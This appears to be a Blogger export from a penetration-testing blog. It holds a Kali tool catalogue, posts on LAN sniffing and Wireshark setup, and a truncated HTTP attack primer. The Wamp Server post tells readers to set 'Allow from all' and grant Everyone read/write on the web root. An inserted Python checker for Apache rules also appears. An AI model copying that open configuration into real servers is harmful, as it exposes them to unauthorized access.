<li><a href="http://tools.kali.org/sniffingspoofing/sctpscan" title="sctpscan">sctpscan</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/siparmyknife" title="SIPArmyKnife">SIPArmyKnife</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/sipp" title="SIPp">SIPp</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/sipvicious" title="SIPVicious">SIPVicious</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/sniffjoke" title="SniffJoke">SniffJoke</a> </li>
<li><a href="http://tools.kali.org/information-gathering/sslsplit" title="SSLsplit">SSLsplit</a> </li>
<li><a href="http://tools.kali.org/information-gathering/sslstrip" title="sslstrip">sslstrip</a> </li>
<li><a href="http://tools.kali.org/information-gathering/thc-ipv6" title="THC-IPV6">THC-IPV6</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/voiphopper" title="VoIPHopper">VoIPHopper</a> </li>
<li><a href="http://tools.kali.org/web-applications/webscarab" title="WebScarab">WebScarab</a> </li>
<li><a href="http://tools.kali.org/wireless-attacks/wifi-honey" title="Wifi Honey">Wifi Honey</a> </li>
<li><a href="http://tools.kali.org/information-gathering/wireshark" title="Wireshark">Wireshark</a> </li>
<li><a href="http://tools.kali.org/sniffingspoofing/xspy" title="xspy">xspy</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/yersinia" title="Yersinia">Yersinia</a> </li>
<li><a href="http://tools.kali.org/web-applications/zaproxy" title="zaproxy">zaproxy</a> </li>
</ul>
</div>
<div class="one_fourth">
<h5>
Password Attacks</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/information-gathering/acccheck" title="acccheck">acccheck</a> </li>
<li><a href="http://tools.kali.org/web-applications/burpsuite" title="Burp Suite">Burp Suite</a> </li>
<li><a href="http://tools.kali.org/password-attacks/cewl" title="CeWL">CeWL</a> </li>
<li><a href="http://tools.kali.org/password-attacks/chntpw" title="chntpw">chntpw</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/cisco-auditing-tool" title="cisco-auditing-tool">cisco-auditing-tool</a> </li>
<li><a href="http://tools.kali.org/password-attacks/cmospwd" title="CmosPwd">CmosPwd</a> </li>
<li><a href="http://tools.kali.org/password-attacks/creddump" title="creddump">creddump</a> </li>
<li><a href="http://tools.kali.org/password-attacks/crunch" title="crunch">crunch</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/dbpwaudit" title="DBPwAudit">DBPwAudit</a> </li>
<li><a href="http://tools.kali.org/password-attacks/findmyhash" title="findmyhash">findmyhash</a> </li>
<li><a href="http://tools.kali.org/password-attacks/gpp-decrypt" title="gpp-decrypt">gpp-decrypt</a> </li>
<li><a href="http://tools.kali.org/password-attacks/hash-identifier" title="hash-identifier">hash-identifier</a> </li>
<li><a href="http://tools.kali.org/vulnerability-analysis/hexorbase" title="HexorBase">HexorBase</a> </li>
<li><a href="http://tools.kali.org/password-attacks/hydra" title="THC-Hydra">THC-Hydra</a> </li>
<li><a href="http://tools.kali.org/password-attacks/john" title="John the Ripper">John the Ripper</a> </li>
<li><a href="http://tools.kali.org/password-attacks/johnny" title="Johnny">Johnny</a> </li>
<li><a href="http://tools.kali.org/password-attacks/keimpx" title="keimpx">keimpx</a> </li>
<li><a href="http://tools.kali.org/information-gathering/maltego-teeth" title="Maltego Teeth">Maltego Teeth</a> </li>
<li><a href="http://tools.kali.org/password-attacks/maskprocessor" title="Maskprocessor">Maskprocessor</a> </li>
<li><a href="http://tools.kali.org/password-attacks/multiforcer" title="multiforcer">multiforcer</a> </li>
<li><a href="http://tools.kali.org/password-attacks/ncrack" title="Ncrack">Ncrack</a> </li>
<li><a href="http://tools.kali.org/password-attacks/oclgausscrack" title="oclgausscrack">oclgausscrack</a> </li>
<li><a href="http://tools.kali.org/password-attacks/pack" title="PACK">PACK</a> </li>
<li><a href="http://tools.kali.org/password-attacks/patator" title="patator">patator</a> </li>
<li><a href="http://tools.kali.org/password-attacks/phrasendrescher" title="phrasendrescher">phrasendrescher</a> </li>
<li><a href="http://tools.kali.org/password-attacks/polenum" title="polenum">polenum</a> </li>
<li><a href="http://tools.kali.org/password-attacks/rainbowcrack" title="RainbowCrack">RainbowCrack</a> </li>
<li><a href="http://tools.kali.org/password-attacks/rcracki-mt" title="rcracki-mt">rcracki-mt</a> </li>
<li><a href="http://tools.kali.org/password-attacks/rsmangler" title="RSMangler">RSMangler</a> </li>
<li><a href="http://tools.kali.org/password-attacks/sqldict" title="SQLdict">SQLdict</a> </li>
<li><a href="http://tools.kali.org/password-attacks/statsprocessor" title="Statsprocessor">Statsprocessor</a> </li>
<li><a href="http://tools.kali.org/password-attacks/thc-pptp-bruter" title="THC-pptp-bruter">THC-pptp-bruter</a> </li>
<li><a href="http://tools.kali.org/password-attacks/truecrack" title="TrueCrack">TrueCrack</a> </li>
<li><a href="http://tools.kali.org/web-applications/webscarab" title="WebScarab">WebScarab</a> </li>
<li><a href="http://tools.kali.org/password-attacks/wordlists" title="wordlists">wordlists</a> </li>
<li><a href="http://tools.kali.org/web-applications/zaproxy" title="zaproxy">zaproxy</a> </li>
</ul>
</div>
<div class="one_fourth">
<h5>
Maintaining Access</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/maintaining-access/cryptcat" title="CryptCat">CryptCat</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/cymothoa" title="Cymothoa">Cymothoa</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/dbd" title="dbd">dbd</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/dns2tcp" title="dns2tcp">dns2tcp</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/http-tunnel" title="http-tunnel">http-tunnel</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/httptunnel" title="HTTPTunnel">HTTPTunnel</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/intersect" title="Intersect">Intersect</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/nishang" title="Nishang">Nishang</a> </li>
<li><a href="http://tools.kali.org/password-attacks/polenum" title="polenum">polenum</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/powersploit" title="PowerSploit">PowerSploit</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/pwnat" title="pwnat">pwnat</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/ridenum" title="RidEnum">RidEnum</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/sbd" title="sbd">sbd</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/u3-pwn" title="U3-Pwn">U3-Pwn</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/webshells" title="Webshells">Webshells</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/weevely" title="Weevely">Weevely</a> </li>
<li><a href="http://tools.kali.org/maintaining-access/winexe" title="Winexe">Winexe</a> </li>
</ul>
<h5>
Hardware Hacking</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/hardware-hacking/android-sdk" title="android-sdk">android-sdk</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/apktool" title="apktool">apktool</a> </li>
<li><a href="http://tools.kali.org/hardware-hacking/arduino" title="Arduino">Arduino</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/dex2jar" title="dex2jar">dex2jar</a> </li>
<li><a href="http://tools.kali.org/hardware-hacking/sakis3g" title="Sakis3G">Sakis3G</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/smali" title="smali">smali</a> </li>
</ul>
</div>
<div class="one_fourth last">
<h5>
Reverse Engineering</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/reverse-engineering/apktool" title="apktool">apktool</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/dex2jar" title="dex2jar">dex2jar</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/distorm3" title="diStorm3">diStorm3</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/edb-debugger" title="edb-debugger">edb-debugger</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/jad" title="jad">jad</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/javasnoop" title="javasnoop">javasnoop</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/jd-gui" title="JD-GUI">JD-GUI</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/ollydbg" title="OllyDbg">OllyDbg</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/smali" title="smali">smali</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/valgrind" title="Valgrind">Valgrind</a> </li>
<li><a href="http://tools.kali.org/reverse-engineering/yara" title="YARA">YARA</a> </li>
</ul>
<h5>
Reporting Tools</h5>
<ul class="lcp_catlist" id="lcp_instance_0">
<li><a href="http://tools.kali.org/information-gathering/casefile" title="CaseFile">CaseFile</a> </li>
<li><a href="http://tools.kali.org/web-applications/cutycapt" title="CutyCapt">CutyCapt</a> </li>
<li><a href="http://tools.kali.org/reporting-tools/dos2unix" title="dos2unix">dos2unix</a> </li>
<li><a href="http://tools.kali.org/reporting-tools/dradis" title="Dradis">Dradis</a> </li>
<li><a href="http://tools.kali.org/reporting-tools/keepnote" title="KeepNote">KeepNote</a> </li>
<li><a href="http://tools.kali.org/reporting-tools/magictree" title="MagicTree">MagicTree</a> </li>
<li><a href="http://tools.kali.org/information-gathering/metagoofil" title="Metagoofil">Metagoofil</a> </li>
<li><a href="http://tools.kali.org/reporting-tools/nipper-ng" title="Nipper-ng">Nipper-ng</a> </li>
<li><a href="http://tools.kali.org/reporting-tools/pipal" title="pipal">pipal</a> </li>
</ul>
</div>
</div>
</div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-69472330509229796372015-04-10T18:34:00.001+03:002015-04-10T18:34:39.885+03:00
Listening to the Network Traffic of Computers on the Local Network<br />
On Linux-based operating systems such as BackTrack, you can see all the traffic on your local network by putting your network card into promiscuous mode. To do this, enter the command shown below. You can also capture all the traffic with Wireshark.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg25beTPOd4bV2aAJjVRKPHeAAA71HfoqanAvSnc5b5z_TltRXUbe4CEVG3fNGRJ_UTVc4Sz6tXE0fia20byJGa3bVoh6XZvtjTtNcPY7B3Iao3ylpJpCr5WGbJwrS_QWIzebv_BxitdlY/s1600/promisc.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg25beTPOd4bV2aAJjVRKPHeAAA71HfoqanAvSnc5b5z_TltRXUbe4CEVG3fNGRJ_UTVc4Sz6tXE0fia20byJGa3bVoh6XZvtjTtNcPY7B3Iao3ylpJpCr5WGbJwrS_QWIzebv_BxitdlY/s1600/promisc.PNG" height="302" width="640" /></a></div>
<br />Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-23697825495605879922015-04-10T11:48:00.000+03:002015-04-10T11:48:38.147+03:00
Publishing a Site on Your Local Network with Wamp Server<br />
In pentest work, having a test environment at hand lets you intervene immediately, measure cause and effect quickly, and exercise both defensive and offensive vectors without taking on any risk. To that end, you can use tools such as Wamp Server to set up one or more sites on your own local network, for use by you and by the other local users.<br />
<br />
To do this, download and install Wamp Server. After installation, the <b>C:\wamp\www</b> directory is created on Windows. Put the files of the site you want to test or use there.<br />
<br />
Next, on the computer where Wamp Server is installed, find the following section in Apache's httpd.conf file:<br />
<br />
# Require all granted<br />
# onlineoffline tag - don't remove<br />
Order Deny,Allow<br />
Deny from all<br />
Allow from 127.0.0.1<br />
Allow from ::1<br />
Allow from localhost<br />
</Directory><br />
<br />
Change it to the following:<br />
<br />
# Require all granted<br />
# onlineoffline tag - don't remove<br />
Order Deny,Allow<br />
Allow from all<br />
</Directory><br />
<br />
Then, on the same computer:<br />
<br />
Right-click the <b>www</b> folder in the <b>C:\wamp</b> directory and go to the <b>Shared</b> (sharing) section. Add the <b>Everyone</b> group as shown below and enable the <b>Read/Write</b> permission.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggG4-hyUnnHSb8nAfnmg1yZPaWA3JYpuIknkaSDAlUUyAVfXt83bvRbnMH8TSHHKu2fkVPQshsCoWSEmucvHXjWoxyCQJW7vhFu07l8cvhkP3-bnr3yGX2nGMYwtmdYbJ7wHhGTS9d9Kk/s1600/www-kals%C3%B6r%C3%BC-payla%C5%9F%C4%B1m.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggG4-hyUnnHSb8nAfnmg1yZPaWA3JYpuIknkaSDAlUUyAVfXt83bvRbnMH8TSHHKu2fkVPQshsCoWSEmucvHXjWoxyCQJW7vhFu07l8cvhkP3-bnr3yGX2nGMYwtmdYbJ7wHhGTS9d9Kk/s1600/www-kals%C3%B6r%C3%BC-payla%C5%9F%C4%B1m.PNG" height="243" width="400" /></a></div>
<br />
Finally, for anyone who needs to reach this site from a Windows machine, add the following line to the <b>hosts</b> file in the <b>C:\Windows\System32\drivers\etc</b> directory:<br />
<br />
<b>192.168.0.30 test.dvwa.com</b><br />
<br />
Here 192.168.0.30 is the <b>IP</b> address of the computer on which Wamp Server is installed, and <b>test.dvwa.com</b> is the <b>URL</b> that, when typed into the browser, takes you directly to the site hosted on Wamp Server.<br />
<br />
If you want to reach it from a Linux machine, edit the <b>hosts</b> file in the <b>/etc</b> directory instead:<br />
<br />
Add the entry <b>192.168.0.30 test.dvwa.com</b>, then save and exit.<br />
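What the httpd.conf change above does to reachability, as an added example that is not part of the original post: a small offline evaluator for Apache 2.2 <code>Order</code>/<code>Allow</code>/<code>Deny</code> rules, run against the post's two access blocks and a constructed lab-only variant. The <code>192.168.0.0/24</code> range and the sample client addresses are assumptions; host names in <code>Allow from</code> are not resolved here.

```python
import ipaddress

# Access rules from the post's httpd.conf block, before and after the edit.
BEFORE = """
Order Deny,Allow
Deny from all
Allow from 127.0.0.1
Allow from ::1
Allow from localhost
"""
AFTER = """
Order Deny,Allow
Allow from all
"""
# Constructed variant (assumption): only loopback and the lab subnet that
# contains the post's 192.168.0.30 server may connect.
LAB_ONLY = """
Order Deny,Allow
Deny from all
Allow from 127.0.0.1
Allow from ::1
Allow from 192.168.0.0/24
"""


def parse_rules(text):
    """Return (order, allow_specs, deny_specs) from Apache 2.2 directives."""
    order, allow, deny = "deny,allow", [], []   # Apache's default Order
    for line in text.splitlines():
        words = line.strip().split()
        if not words or words[0].startswith("#"):
            continue
        keyword = words[0].lower()
        if keyword == "order" and len(words) >= 2:
            order = "".join(words[1:]).lower()  # tolerate "Deny, Allow"
        elif (keyword in ("allow", "deny") and len(words) >= 3
              and words[1].lower() == "from"):
            (allow if keyword == "allow" else deny).extend(words[2:])
    if order not in ("deny,allow", "allow,deny"):
        raise ValueError("unsupported Order value: %r" % order)
    return order, allow, deny


def spec_matches(spec, client):
    """True if one Allow/Deny argument covers the client address."""
    if spec.lower() == "all":
        return True
    try:
        network = ipaddress.ip_network(spec, strict=False)
    except ValueError:
        # Host names such as "localhost" need a DNS lookup in Apache, and
        # partial addresses are not handled; both count as non-matching.
        return False
    return client.version == network.version and client in network


def is_allowed(rules_text, client_ip):
    """Evaluate the rules for one client the way mod_authz_host orders them."""
    order, allow, deny = parse_rules(rules_text)
    client = ipaddress.ip_address(client_ip)
    allowed = any(spec_matches(spec, client) for spec in allow)
    denied = any(spec_matches(spec, client) for spec in deny)
    if order == "deny,allow":
        # Deny is checked first, a matching Allow overrides it, default allow.
        return allowed or not denied
    # allow,deny: a matching Deny overrides Allow, default deny.
    return allowed and not denied


def exposure(rules_text, clients):
    """Map each sample client address to True (served) or False (refused)."""
    return {ip: is_allowed(rules_text, ip) for ip in clients}


if __name__ == "__main__":
    # Constructed clients: loopback, a lab neighbour, an outside address.
    sample_clients = ["127.0.0.1", "192.168.0.31", "203.0.113.7"]
    for label, rules in (("before", BEFORE), ("after", AFTER),
                         ("lab only", LAB_ONLY)):
        print(label, exposure(rules, sample_clients))
```

With <code>Allow from all</code> every address that can route to the machine is served, so the lab-only variant is the narrower setting when the host is also connected to other networks.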
<br />
<br />
<br />
<br />Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com2tag:blogger.com,1999:blog-9189801013696365858.post-45793709174959134782015-03-12T17:29:00.000+02:002015-03-18T17:31:48.015+02:00
Virtual Machine: Making the Network Driver Visible to Wireshark on Ubuntu<br />
<span style="background-color: #eeeeee;">What needs to be done to make the network driver visible to Wireshark on Ubuntu installed as a virtual machine is shown below.</span><br />
<span style="background-color: #eeeeee;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdRPxbYfzpWewIJ87_OLkmLGA6AFN5n3xzCrb1rtZ8NTd2kmFBjk3hF6iS_3jLzj4D51BSxjfjMfjdzTEpd8hXSyx8tB1R4M33JAMyxo0b4PldoyiwzaP6FV0Mhvw5UL5dOR7TFhX-Iaw/s1600/W1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdRPxbYfzpWewIJ87_OLkmLGA6AFN5n3xzCrb1rtZ8NTd2kmFBjk3hF6iS_3jLzj4D51BSxjfjMfjdzTEpd8hXSyx8tB1R4M33JAMyxo0b4PldoyiwzaP6FV0Mhvw5UL5dOR7TFhX-Iaw/s1600/W1.PNG" height="301" width="400" /></a></div>
<span style="background-color: #eeeeee;"><br /></span>
<br />
<div>
<span style="background-color: #eeeeee;"></span><br />
<a name='more'></a><span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<span style="background-color: #eeeeee;">However, we can make the network driver visible to Wireshark by entering the commands below.</span></div>
<div>
<span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJYPOfjxMagocF9Hh0as4TbQZrv-fmaq_4l0WTYTzGPND3WGv35_lF2ec0-Xgzvyi7gqf6X86TnmOzbHsxKPUL02bCXIJroSIXNFTxwwBHMOfCr1TjHtus9kXV_iKUqA1W5SqtyUoX4lk/s1600/W2.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJYPOfjxMagocF9Hh0as4TbQZrv-fmaq_4l0WTYTzGPND3WGv35_lF2ec0-Xgzvyi7gqf6X86TnmOzbHsxKPUL02bCXIJroSIXNFTxwwBHMOfCr1TjHtus9kXV_iKUqA1W5SqtyUoX4lk/s1600/W2.PNG" height="256" width="400" /></a></div>
<div>
<span style="background-color: #eeeeee;"><br /></span></div>
<div>
<span style="background-color: #eeeeee;">After the commands are entered, Wireshark looks as shown below.</span></div>
<div>
<span style="background-color: #eeeeee;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsCKgbjcsqXpSQaEG5vR4gDHz2SzsWTmnRn6z4el0_Ib41coCW52q35x8rV67yODCHfSucWnnEELqYDmZlX2UlpcRjMOdVSNBmO0AjSdleQGwmUJjdF9k6343KGOxYDxVz-1dNVU9HecE/s1600/W3.PNG" imageanchor="1" style="background-color: #eeeeee; margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsCKgbjcsqXpSQaEG5vR4gDHz2SzsWTmnRn6z4el0_Ib41coCW52q35x8rV67yODCHfSucWnnEELqYDmZlX2UlpcRjMOdVSNBmO0AjSdleQGwmUJjdF9k6343KGOxYDxVz-1dNVU9HecE/s1600/W3.PNG" height="303" width="400" /></a></div>
<div>
<span style="background-color: #eeeeee;"><br /></span></div>
<div>
<br /></div>
Pentesttrhttp://www.blogger.com/profile/17047185388431875520noreply@blogger.com0tag:blogger.com,1999:blog-9189801013696365858.post-70782900221598865142015-03-11T09:43:00.000+02:002015-03-18T17:32:01.786+02:00
Important Information About the HTTP Protocol
<h3 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 24px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">
Most Common Attack Methods</span></h3>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Broken authentication:</strong> Unauthorized access gained either by bypassing login forms that are misconfigured or through brute-force attacks that take advantage of weak passwords.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Broken access controls: </strong>Vulnerabilities that, because of missing or incorrect configuration on the server, give access to the data of users that lies outside one's authorization.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">SQL Injection: </strong>A vulnerability that uses weaknesses in the interaction between the application and the database to retrieve data one is not authorized to see and to control the database server at will.</span><br />
<a name='more'></a></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Cross-site scripting: </strong>Attacks in which JavaScript code is used to steal users' information (XSS attacks).</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Cross-site request forgery: </strong>JavaScript code is used, but in these attacks it is the victims who perform the interaction. The vulnerability is triggered when the victim interacts with malicious links, images and similar objects that look normal.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Information leakage: </strong>An attack carried out with sensitive information about the application that was obtained by analyzing application errors.</span></div>
<h3 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 24px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: #eeeeee; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">HTTP Methods</strong></h3>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">GET</strong>: Used when the request and its parameters travel in the URL. Because every request is logged, sensitive parameters such as passwords and usernames end up in the logs.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">POST</strong>: Used when the parameters travel in the body rather than in the URL.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">HEAD</strong>: The request carries only the URL. It is used to check whether the server exists or whether the requested item is present on the server.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">TRACE</strong>: This method is used to check whether the request has been modified.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">OPTIONS</strong>: Requests the list of HTTP methods that can be used on the server.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">PUT</strong>: A method used to add data to the server. Its access control must be configured carefully; otherwise malicious data can be injected.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">DELETE</strong>: A method used to delete data from the server. Its access control must be configured carefully.</span></div>
<h3 style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 24px; font-weight: 300; line-height: 1.2em; margin: 1.25em 0px 0.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<strong style="background-color: #eeeeee; border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Meaning of the HTTP Request Fields</strong></h3>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">GET </strong>/auth/488/YourDetails.ashx?uid=129 HTTP/1.1</span><br />
<span style="background-color: #eeeeee;">Accept: application/x-ms-application, image/jpeg, application/xaml+xml,</span><br />
<span style="background-color: #eeeeee;">image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwaveflash,</span><br />
<span style="background-color: #eeeeee;">*/*</span><br />
<span style="background-color: #eeeeee;">Referer: https://mdsec.net/auth/488/Home.ashx</span><br />
<span style="background-color: #eeeeee;">Accept-Language: en-GB</span><br />
<span style="background-color: #eeeeee;">User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64;</span><br />
<span style="background-color: #eeeeee;">Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR</span><br />
<span style="background-color: #eeeeee;">3.0.30729; .NET4.0C; InfoPath.3; .NET4.0E; FDM; .NET CLR 1.1.4322)</span><br />
<span style="background-color: #eeeeee;">Accept-Encoding: gzip, deflate</span><br />
<span style="background-color: #eeeeee;">Host: mdsec.net</span><br />
<span style="background-color: #eeeeee;">Connection: Keep-Alive</span><br />
<span style="background-color: #eeeeee;">Cookie: SessionId=5B70C71F3FD4968935CDB6682E545476</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;">———————————</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: #eeeeee;"><strong style="border: 0px; box-sizing: border-box; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">GET</strong> --> The HTTP method used</span></div>
<div style="border: 0px; box-sizing: border-box; color: #333333; font-family: 'Times New Roman', Times, serif; font-size: 16px; line-height: 24px; margin-bottom: 1.5em; outline: 0px; padding: 0px; vertical-align: baseline;">
